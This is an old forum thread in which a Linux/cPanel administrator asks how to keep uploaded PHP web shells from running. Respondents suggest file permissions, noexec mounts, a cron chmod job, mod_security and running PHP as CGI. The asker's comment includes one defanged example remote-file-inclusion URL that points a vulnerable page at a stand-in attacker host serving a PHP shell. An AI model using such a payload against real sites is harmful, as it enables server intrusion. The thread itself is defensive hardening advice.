Solved

prevent shells

Posted on 2008-06-16
17
598 Views
Last Modified: 2010-08-05
      Hello,
i have a Linux server with cpanel and whm on apache server
i need a  way  in a programing shell script  to prevent the execution of the most common php shell pages like r75 and ch99


i need shell pages not to be executed even if its uploaded
not just depend on the file names but depend also on the file content
i have copies of all the common shells in case the programmer need to have a look on them to know what he is going to disable


i know there are way in mod security and i know the root kit hunter but actually am looking for  a way by programing shell script that prevent the execution of the most common php shell page.

0
Comment
Question by:NT-lover
  • 5
  • 3
  • 2
  • +4
17 Comments
 
LVL 40

Expert Comment

by:omarfarid
Comment Utility
How the files are uploaded?

You may revoke execute permission from those files.
0
 

Author Comment

by:NT-lover
Comment Utility
hi

actually am looking for solution in scripting shell when hackers they success to uploaded to my server
0
 

Author Comment

by:NT-lover
Comment Utility
Gents


this question  just for EXPERTS   i need shell pages not to be executed even if its uploaded



by  find solution also by  programing script shell  that prevent   php shell pages like r75 and ch99 not just depend on the file names but depend also on the file content,


Regads

 
0
 

Author Comment

by:NT-lover
Comment Utility

Dear


PenguinMod,


thank you for replay but actually my question  was very cleared  


(i need way by  programing shell  that prevent shell pages not to be executed even if its uploaded)




and the comment of  My dear . omarfarid:

(You may revoke execute permission from those files).




and you can see am not talking about permission my question  was very clear   as i mention i need way that prevent shell pages not to be  EXECUTED EVEN IF ITS UPLOADED by  (Shell language) not by  permission or way in permission and i mention also EVEN IF ITS UPLOADED



so am not here disrespected anyone and if my dear omarfarid see my words is disrespected for him am apology's for him



  but  i need the experts people that can handle the questions serious and help me and help any one have the same question so the matter is not related to disrespected to anyone i need just  experts and they read the complete question before they post any comment or solution so am not here disrespected anyone



So this my first question if am not welcome here and  am not find here help from experts so please tell dear PenguinMod: to cancel my membership and cancel this question


 thank your for time and your support.


Regards

0
 
LVL 40

Expert Comment

by:omarfarid
Comment Utility
Dear PenguinMod:

Thank you for monitoring the questions and comments made.

Dear NT-lover:

I would like to clarify something. As EE Experts, our goal is to help in answering questions posted.

When I read your question, it was not clear to me how the shell pages are uploaded since hosting providers do allow their customers to upload their pages etc. The first thing came to my mind was if this is the case then revoking the permissions of these pages might give you what you want.
0
 

Author Comment

by:NT-lover
Comment Utility
Dear omarfarid


First of all, thank you for your replay  and actually i appreciate your help As EE Experts



Second point dear omarfarid

 you should know  there are many exploits that can any hacker upload any php shell such as symlink function , RFI . XSS .. and this example for RFI


httX://yourSite/bad_code_file.php?action=_httX://attackerSite/phpShell.txt?


so here am not talk about permissions  actually i talk about


How i can stop any php shell after uploaded to my server (and am looking to find solution by shell scripting language ) i hope my question it well be clear know.


Best Regards
0
 
LVL 12

Accepted Solution

by:
nexusnation earned 100 total points
Comment Utility
NT-lover,

I am no expert,  but if you set the file modes/permissions using the Chmod UNIX/Linux command to something that does not allow execution, the file by definition cannot be executed. Provided you consider Chmod a "programming shell script," this will work perfectly to prevent the script from being able to execute.

http://en.wikipedia.org/wiki/Chmod
0
Highfive Gives IT Their Time Back

Highfive is so simple that setting up every meeting room takes just minutes and every employee will be able to start or join a call from any room with ease. Never be called into a meeting just to get it started again. This is how video conferencing should work!

 

Author Comment

by:NT-lover
Comment Utility
nexusnation,


it well not help me any solution by modes/permissions because i see many tools that hackers  used it to break the permissions  easily  also if  i prevent   php shell by using idea that related to  permission ? what about perl shell , cgi  shell , telnet shell in addition there are private exploit in php that can break the  file permissions my friend face it before 4 month


so it well not help me  but really thank you for your help and really i appreciate it.


regards
0
 
LVL 12

Expert Comment

by:nexusnation
Comment Utility
NT-lover,

If you're that unnecessarily paranoid about security, you're never going to agree to any solution provided, so there's not much more I can do to help.

File permissions are *not* PHP-based.  They are server-based (in this case Linux).  You can't simply break them using PHP, nor do you set them using php.  Chmod IS a shell command.  This is *exactly* what you're looking for; there's not much else.  After that, you're simply confusing terminology as well as technologies.

There are only two ways to prevent execution of code to your expectation of security:
 - Set appropriate file permissions on the server.
 - Don't upload it to begin with.

That's it.
0
 
LVL 16

Assisted Solution

by:Hanno Schröder
Hanno Schröder earned 100 total points
Comment Utility
a file on a unix system that does not have execute permissions cannot be executed -- that's what the execute permissionis for
This is fundamentally different to any kind of Windows OS as there is no
such mechanism known. Any file with matching extension in it's bare name
(e.g. *.exe) can get executed right away.

The only way to "execute" fileson a Unix-based system which don't have
the execute permission is by letting them get interpreted by some other
executable program. Most commonly, you use some shell (executable) to
interpret a shell script.

Assume you have the file /path-to/file/abc.sh wich is not executable.
You cannot execute it with the command
  /path-to/file/abc.sh
But it can get interpreted by a shell with the command
  /usr/bin/my-shell  /path-to/file/abc.sh
0
 
LVL 51

Assisted Solution

by:ahoffmann
ahoffmann earned 100 total points
Comment Utility
> .. there are many exploits that can any hacker upload any php shell ..
how about simply disabling uploads
Or do I miss something in the description?
0
 
LVL 19

Assisted Solution

by:Redimido
Redimido earned 100 total points
Comment Utility
hey I like the comment from ahoffmann :-)

there are a lot of ways you can harden your system

a) upload your files to a partition that has the "noexec" parameter. it is simple: no program will be started from a mount point that has the "noexec" turned on. that is usual for /tmp and /var/tmp

b) only allow php to execute a defined extension, like .php
c) restrict your upload script to NOT ACCEPT anything with extension .php
d) execute file scanners as rootkit hunter.
e) you can write crontab. every minute it launchs a find command for executables. changes them to not exec:
* * * * * /sbin/find /upload/directory -type f -perm +x -exec /sbin/chmod a-x {} \;

also files should not be owned by the same user your web server is running with, so they are not modificable.

these are the first that come into my mind. YMMV
0
 
LVL 11

Assisted Solution

by:gothicbloody
gothicbloody earned 100 total points
Comment Utility
Hi ,
Install mod_security with rules web server firewall , and also try to install suPHP to run script under the same users , and also check folder permissions
0
 
LVL 19

Expert Comment

by:Redimido
Comment Utility
mod_security can be costly when the site has many hundred of users. other thant that, it is a great way to secure your system
0
 
LVL 19

Expert Comment

by:Redimido
Comment Utility
I got an alert about this question being closed.

Before it is closed, I want to comment a way PHP scripts can be stoped:

use PHP as cgi-bin, not as a module for apache.

then disallow uploads to the cgi-bin directory (very easy is you simply set directory permissions).

that way, even if a php script can be uploaded to the system, it would not be executed unless such script is in the cgi-bin directory, which is not writable.

that is exactly what was asked. how to prevent an uploaded php script to be executed.

NT-lover: can you reply back if this is your answer pls?
0

Featured Post

Threat Intelligence Starter Resources

Integrating threat intelligence can be challenging, and not all companies are ready. These resources can help you build awareness and prepare for defense.

Join & Write a Comment

A brand new malware strain was recently discovered by security researchers at Palo Alto Networks dubbed “AceDeceiver.” This new strain of iOS malware can successfully infect non-jailbroken devices and jailbroken devices alike.
Read about achieving the basic levels of HRIS security in the workplace.
Learn several ways to interact with files and get file information from the bash shell. ls lists the contents of a directory: Using the -a flag displays hidden files: Using the -l flag formats the output in a long list: The file command gives us mor…
Polish reports in Access so they look terrific. Take yourself to another level. Equations, Back Color, Alternate Back Color. Write easy VBA Code. Tighten space to use less pages. Launch report from a menu, considering criteria only when it is filled…

762 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

11 Experts available now in Live!

Get 1:1 Help Now